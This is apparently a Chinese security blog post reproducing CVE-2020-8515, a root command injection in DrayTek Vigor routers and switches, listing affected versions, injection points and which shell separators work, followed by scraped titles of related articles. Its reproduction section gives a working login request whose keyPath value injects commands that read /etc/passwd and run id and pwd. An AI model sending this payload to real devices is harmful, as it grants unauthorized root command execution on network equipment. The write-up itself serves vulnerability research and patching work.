一、漏洞描述

DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令。

远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。

二、影响范围

Vigor2960 < v1.5.1

Vigor300B < v1.5.1

Vigor3900 < v1.5.1

VigorSwitch20P2121 <= v2.3.2

VigorSwitch20G1280 <= v2.3.2

VigorSwitch20P1280 <= v2.3.2

VigorSwitch20G2280 <= v2.3.2

VigorSwitch20P2280 <= v2.3.2

三、漏洞复现

登录界面登录burp抓包:

抓取登录数据包添加keypath的paylod的字段

payloay:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

在这个基础上继续研究了本漏洞支持其他可以执行的命令:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

shell方面,因为输入的命令是由mainfunction.cgi解析的,所以空格会被替换为“+”(存在一些困难)。

注入点涉及keyPath和rtick,和/www/cgi-bin/mainfunction.cgi文件有关,对应的web服务程序为/usr/sbin/lighttpd

主要是&符号的执行,可以进行拼接,但是|、;就不行

python脚本验证:

四、参考链接:

https://nosec.org/home/detail/4406.html

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8515

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

公众号:

thelostworld:

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

Draytek企业网络设备命令注入复现(CVE-2020-8515)相关推荐

  1. 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)

    OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...

  2. openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)

    本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...

  3. Foxit Reader(福昕阅读器)(CVE-2020-14425)命令注入漏洞复现

    0x00简介 Foxit Reader,是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发:2009年9月3日推出3.1.1 Build 0901最新版本.Foxit Reader是一套自由使用 ...

  4. CVE-2018-1111漏洞复现-环境搭建与dhcp命令注入

    0×01 前言 2018年5月,在Red Hat Enterprise Linux多个版本的DHCP客户端软件包所包含的NetworkManager集成脚本中发现了命令注入漏洞(CVE-2018-11 ...

  5. 【安全漏洞】Cisco命令注入漏洞CVE-2021-1414分析

    概述 最近关注了Cisco的一个命令注入漏洞CVE-2021-1414,命令注入之后可导致远程代码执行: 漏洞存在于固件版本低于V1.0.03.21的RV340系列路由器中,当前最新版本V1.0.03 ...

  6. OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)

    一.漏洞概要 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开.OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者 ...

  7. CVE-2022-33891:Apache Spark 命令注入漏洞通告

    0x01   漏洞简述 2022年07月19日,Apache官方发布了Apache Spark的风险通告,漏洞编号为CVE-2022-33891,漏洞等级:中危,漏洞评分:6.5. Apache Sp ...

  8. kylin源码调试_Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956)

    原标题:Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956) 1.前言 Apache Kylin是一个开源的.分布式的分析型数据仓库,提供Hadoop/Spark 之上的 SQ ...

  9. java 漏洞挖掘_Apache Tika命令注入漏洞挖掘

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...

最新文章

  1. 考考基础部分,谈谈Java集合中HashSet的原理及常用方法
  2. python如何自学模块_跟老齐学Python之Import 模块
  3. 处理 Oracle SQL in 超过1000 的解决方案
  4. python集合类型_Python 的集合(set)类型
  5. 64位win7使用debug的方法
  6. 单片微型计算机简称单片机是指集成,什么是单片微型计算机 -解决方案-华强电子网...
  7. BUUOJ reverse 刮开有奖
  8. python 求子字符串_(6)KMP算法(求子串的位置)______字符串的匹配
  9. 疑似小米11 Pro保护壳曝光:横向矩阵相机设计
  10. SOTA太难了?试试Dropout
  11. Webpack4 学习笔记二 CSS模块转换
  12. 最短路POJ 1062 昂贵的聘礼
  13. c语言case后面可以接表达式,c++ switch语句的使用(case 后面可以跟N个语句)
  14. 三星java手机播放器下载_8k视频播放器软件下载安卓-三星8k视频播放器KMPlayer下载v30.10.231 内置提取版-西西软件下载...
  15. Windows解压文件名乱码解决方法
  16. 微信Android客户端后台保活经验分享
  17. 不可错过的《一步一步学Spring Boot》视频教程
  18. 二维正态分布matlab程序,一维正态分布、二维正态分布的matlab实现
  19. 接口自动化测试概述及流程梳理
  20. 梦幻西游手游经验任务链计算机,梦幻西游手游任务链帮派求助刷经验技巧

热门文章

  1. 2011奥斯卡金像奖获奖名单(呵呵,里面的电影还是值得去看的!(*^__^*) )
  2. Hadoop之常见压缩格式以及性能对比
  3. 刘顺琦 - CSCI561 Related Vocabulary
  4. eclipse 操作
  5. Python-学习笔记
  6. java 输入狗狗的年龄换算成人的年龄
  7. python 虚部_python – Numpy警告:将Complex复制到实际丢弃的虚部
  8. 用matlab编写逢七必过游戏规则,数字图像处理及应用(MATLAB)第4章
  9. 超丰田追苹果,特斯拉凭什么成为全球市值第一车企?
  10. bzoj3047:Freda的传呼机bzoj2125: 最短路